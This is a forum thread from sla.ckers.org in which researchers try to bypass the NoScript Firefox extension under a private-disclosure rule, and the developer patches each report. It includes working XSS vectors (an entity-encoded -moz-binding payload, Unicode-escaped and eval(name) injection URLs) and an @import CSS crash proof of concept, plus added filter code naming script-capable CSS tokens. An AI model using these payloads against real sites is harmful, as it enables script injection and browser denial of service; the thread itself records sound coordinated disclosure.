Sla.ckers.org
Whether this is about ha.ckers.org, sla.ckers.org or some other project you are interested in or want to talk about, throw it in here to get feedback. 
Hacking noscript
Posted by: Gareth Heyes
Date: November 07, 2007 03:35AM

Ok people here's the challenge...

Execute Javascript whilst a site is untrusted
OR
Create a XSS attempt across sites which isn't caught by noscript
OR
Bypass content protection (Flash, frames etc)
OR
Cause DOS

IMPORTANT RULES UPDATE
----------------------
One week private notice to ma1 before public disclosure is required.

Let the fun begin!

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Re: Hacking noscript
Posted by: asrail
Date: November 08, 2007 02:36AM

I can't seem to find the sources for the noscript extension - anyone got a url? The website http://noscript.net/ itself does not give any information about "how to contribute" aka "how to white box test for vulnerabilities".

Re: Hacking noscript
Posted by: Anonymous User
Date: November 08, 2007 07:12AM

Just open the XPI file with Winzip or another archive manager.

Re: Hacking noscript
Posted by: ma1
Date: November 09, 2007 02:49PM

asrail Wrote:
-------------------------------------------------------
> I can't seem to find the sources for the noscript
> extension - anyone got a url?

.mario Wrote:
-------------------------------------------------------
> Just open the XPI file with Winzip or another
> archive manager.

Please always use the development build.
Patches are welcome, too.

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript

Re: Hacking noscript
Posted by: Gareth Heyes
Date: November 25, 2007 02:03PM

This seems to beat noscript XSS protection filtering:-

<div style=&#x2D&#x6D&#x6F&#x7A&#x2D&#x62&#x69&#x6E&#x64&
#x69&#x6E&#x67:&#x75&#x72&#x6C&#x28&#x2F&#x2F&#x62&#x75&
#x73&#x69&#x6E&#x65&#x73&#x73&#x69&#x6E&#x66&#x6F&#x2E&
#x63&#x6F&#x2E&#x75&#x6B&#x2F&#x6C&#x61&#x62&#x73&#x2F&
#x78&#x62&#x6C&#x2F&#x78&#x62&#x6C&#x2E&#x78&#x6D&#x6C
&#x23&#x78&#x73&#x73&#x29>

Re: Hacking noscript
Posted by: ma1
Date: November 25, 2007 04:00PM

@gareth:
Thanks, malformed entities (no semicolon) are an ugly beast, we're lucky NoScript already forbids cross-site XBL.
A version handling any entity Gecko knows (or believes to know) is right on its way ;)

Re: Hacking noscript
Posted by: Anonymous User
Date: November 25, 2007 04:34PM

How does it work, Gareth? Can't seem to get it to work here; a hint would be nice.

Re: Hacking noscript
Posted by: ma1
Date: November 25, 2007 05:11PM

@Ronald:
it just gets (loosely) parsed as
<div style="-moz-binding: url(//businessinfo.co.uk/labs/xbl/xbl.xml#xss);"></div>

Re: Hacking noscript
Posted by: Gareth Heyes
Date: November 25, 2007 07:14PM

Sorry Ronald I should have explained the vector more.

The reason it probably didn't work is because it's a mozbinding as Giorgio said and also I had to split it onto separate lines for nice display.
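Added example, not NoScript's or the poster's code: the normalization step a request filter needs before it can match a vector like the one above. It decodes numeric character references with or without the closing semicolon, the way Giorgio describes Gecko loosely parsing them, joins the display line-wrapping Gareth mentions, and only then looks for -moz-binding (or the IE expression() route that comes up later in the thread). The encoded sample, the placeholder host example.test and all function names are constructed for this illustration.

```javascript
// Added example, not NoScript's or the poster's code.  A request filter has to
// see a style value the way Gecko loosely parses it before matching on it.

// Numeric character reference with an OPTIONAL trailing ';': Gecko decodes
// "&#x2D" and "&#45" just like "&#x2D;", so a filter that only recognizes the
// well-formed spelling never sees the decoded text.
const LOOSE_NUMERIC_REF = /&#(?:[xX]([0-9a-fA-F]+)|([0-9]+));?/g;

function decodeLooseEntities(s) {
  return s.replace(LOOSE_NUMERIC_REF, (match, hex, dec) => {
    const cp = hex !== undefined ? parseInt(hex, 16) : parseInt(dec, 10);
    return cp <= 0x10ffff ? String.fromCodePoint(cp) : "\ufffd";
  });
}

// Join display line-wrapping, decode, drop whitespace, lowercase: the form a
// pattern match should run on.
function normalizeStyle(value) {
  const joined = value.replace(/[\r\n]/g, "");
  return decodeLooseEntities(joined).replace(/\s+/g, "").toLowerCase();
}

// -moz-binding (Gecko XBL) and expression( (IE) both let CSS run script.
const SCRIPT_CAPABLE_CSS = ["-moz-binding", "expression("];

function flagsStyle(value) {
  const norm = normalizeStyle(value);
  return SCRIPT_CAPABLE_CSS.some((token) => norm.includes(token));
}

// Constructed sample using the placeholder host example.test, wrapped over
// several lines the way the thread's vector was wrapped for display.  Mixed
// hex and decimal references, none terminated by ';'.
const ENCODED_SAMPLE =
  "&#x2D&#x6D&#x6F&#x7A&#x2D&#x62&#x69&#x6E&#x64&#x69&#x6E&#x67:" +
  "&#117&#114&#108&#40&#x2F&#x2F\n" +
  "&#x65&#x78&#x61&#x6D&#x70&#x6C&#x65&#x2E&#x74&#x65&#x73&#x74\n" +
  "&#x2F&#x78&#x2E&#x78&#x6D&#x6C&#x23&#x78&#x73&#x73&#x29";
```

A naive `includes("-moz-binding")` on the raw value returns false; the same check on the normalized value returns true.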

Re: Hacking noscript
Posted by: ma1
Date: November 26, 2007 04:23PM

NoScript's standard XBL protection should take care of these attacks even if they evade request filters, but for consistency's sake I've just released a development build with improved filters and more flexible XBL settings:

http://noscript.net/getit#devel

Thanks Gareth :)

Re: Hacking noscript
Posted by: Gareth Heyes
Date: November 26, 2007 05:41PM

No probs, just for your reference expression based XSS injection also works on IE7 using entities :)

Re: Hacking noscript
Posted by: Gareth Heyes
Date: December 19, 2007 10:21AM

This beats noscript's XSS protection:-
hxxp://demo.phpids.org/?test=%5Cu9999%3Dalert%0A%5Cu9999(1)

Re: Hacking noscript
Posted by: ma1
Date: December 19, 2007 12:14PM

@Gareth:
clever, thanks :)

Re: Hacking noscript
Posted by: ma1
Date: December 19, 2007 07:09PM

@Gareth:
it's fixed in the current beta.
Could you hammer a bit more before I release it in the official channel?
Thanks again :)

Re: Hacking noscript
Posted by: Gareth Heyes
Date: December 20, 2007 03:20AM

Yeah sure I'll check it out :)

Re: Hacking noscript
Posted by: Gareth Heyes
Date: December 20, 2007 04:19AM

@Giorgio

The development version is much better now, good work! :)

I tried loads of stuff but it looks like you've got the unicode vectors covered now, noscript detects these:-

\u50001 \u0073\u0065\u0074ter=alert
\u50001=1

\u5000\u003d\u002fYWxlcnQoMSk=/\u005b\u002d\u0031\u005d\u000a
\u0030\u005b\u0027eva\l'](atob(\u5000))

Re: Hacking noscript
Posted by: Anonymous User
Date: December 20, 2007 04:21AM


another one:
top?a=eval(name):0
http://demo.phpids.org/?test=top?a=eval(name):0


me stupid - sorry. had the option disabled (slaps himself)
Re: Hacking noscript
Posted by: Gareth Heyes
Date: December 20, 2007 04:27AM

@mario

Seems to be detected by the development version

Re: Hacking noscript
Posted by: ma1
Date: December 20, 2007 12:15PM

@Gareth:
Unicode vectors were already screened by the stable version if they used the ASCII range (\u0000-\u007f), because that was a blatant obfuscation attempt.
Your vector passed first screening because it used the topmost Unicode set, and still wouldn't have passed the JS detection if it wasn't for an over-optimization of my pre-syntax check stage, whose purpose is avoiding SpiderMonkey hits when a string is "obviously" invalid JS -- but obviously, SpiderMonkey knows better than me ;)

If you can't find anything else, I'm gonna release tomorrow.

Thanks again.
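Added example, not NoScript's code, of the two-stage screening described above: a \uXXXX escape for an ASCII-range character is flagged as obfuscation outright, and whether anything else parses as JavaScript is left to the engine (new Function compiles without executing) rather than to a hand-written pre-syntax check that can be over-optimized. The host example.test, the function names and the requirement for a call or assignment token before a parse counts as a hit are constructed assumptions; the sample fragments are the ones posted in this thread.

```javascript
// Added example, not NoScript's code.  Screens a query-string value that might
// be an injected JS fragment, following the two stages described above.

// Stage 1: a \uXXXX escape for a character in the ASCII range (\u0000-\u007f)
// has no honest reason to be escaped, so it is flagged as obfuscation outright.
const ASCII_RANGE_ESCAPE = /\\u00[0-7][0-9a-fA-F]/;

function isBlatantObfuscation(fragment) {
  return ASCII_RANGE_ESCAPE.test(fragment);
}

// Stage 2: let the engine decide whether the fragment is JavaScript at all,
// instead of guessing with a cheaper pre-check.  new Function only compiles
// the body; nothing in it is executed.
function parsesAsJs(fragment) {
  try {
    new Function(fragment);
    return true;
  } catch (e) {
    return false;
  }
}

// A lone word such as "tickets" parses as JS too, so (constructed heuristic)
// require a call, assignment or index before treating a parse as a hit.
const LOOKS_ACTIVE = /[(=\[]/;

function isSuspicious(fragment) {
  return isBlatantObfuscation(fragment) ||
    (LOOKS_ACTIVE.test(fragment) && parsesAsJs(fragment));
}

// Decode every query parameter (so %5C becomes "\" and %0A a newline, as in
// the thread's demo URL) and return the names of the suspicious ones.
function screenUrl(url) {
  const hits = [];
  for (const [name, value] of new URL(url).searchParams) {
    if (isSuspicious(value)) hits.push(name);
  }
  return hits;
}
```

The `\u9999` fragment passes stage 1, since U+9999 is far outside the ASCII range, and is caught only because the engine reports it as valid JavaScript.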

Re: Hacking noscript
Posted by: krazl
Date: January 01, 2008 10:50PM

JAVA PURE EVIL?

http://www.krazl.com

Re: Hacking noscript
Posted by: Gareth Heyes
Date: January 02, 2008 08:02AM

This causes DOS on my computer, I haven't confirmed it on another one yet:-

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
<title>Noscript DOS Crash</title>
<style type="text/css">
@import 'data:text/css, * {-moz-binding:url(http://somefile.xml#xss)}';
</style>
</head>

<body>
</body>
</html>

This could be a noscript or FF problem

Re: Hacking noscript
Posted by: Anonymous User
Date: January 02, 2008 08:11AM

Doesn't work here, could be a NoScript issue cause I don't have it.

Re: Hacking noscript
Posted by: Gareth Heyes
Date: January 02, 2008 08:16AM

Yep I've tested it on another machine without noscript and it doesn't crash. I'll try and confirm it with noscript installed on another machine.

Update...

Tested and it appears to be a noscript DOS problem. It closes the browser completely on my test machine :)

Re: Hacking noscript
Posted by: Gareth Heyes
Date: January 02, 2008 08:26AM

Here's the POC remotely hosted:-
http://www.businessinfo.co.uk/labs/fun/noscript_css_crash.php

Confirmed on 2 computers (different platforms)

Re: Hacking noscript
Posted by: Anonymous User
Date: January 02, 2008 09:10AM

Nice job Gareth, interesting vector btw!

Re: Hacking noscript
Posted by: ma1
Date: January 02, 2008 09:20AM

Not NoScript-specific, actually:

http://evil.hackademix.net/pocs/xbldos

A NoScript-specific workaround is on its way, preventing also this bug from being exploited on untrusted sites.

Re: Hacking noscript
Posted by: Gareth Heyes
Date: January 02, 2008 09:40AM

@Ronald

Thanks I was gonna do a blog post on @import but I couldn't be arsed, also I thought it was well known anyways.

@ma1

Cool glad a fix is in the pipeline :)
Nice recursion mod :) works without noscript full DOS hehe

Re: Hacking noscript
Posted by: Anonymous User
Date: January 02, 2008 10:13PM

@Gareth,

Yeah I knew about @import, but this snippet was quite cute: data:text/css ^^

Re: Hacking noscript
Posted by: ma1
Date: January 03, 2008 02:55AM

NoScript 1.2.3 dev build

v 1.2.3
=====================================================================
+ Improved Injection Checker JSON compatibility, now recursively
  checking content of string attributes
x Further JS syntax check optimizations
x Fixed potential XBL-based crash after successful -moz-binding
  injection (thanks Gareth Heyes for reporting)

x More discreet XSS notification for subframes

Of course, it also protects against the aforementioned generic scriptless XBL crash.

Re: Hacking noscript
Posted by: Gareth Heyes
Date: January 03, 2008 03:07AM

@Ronald

Yeah it's quite handy, if there was a way to use it inline that would be cool.

@ma1

Cool I'll check out the latest version
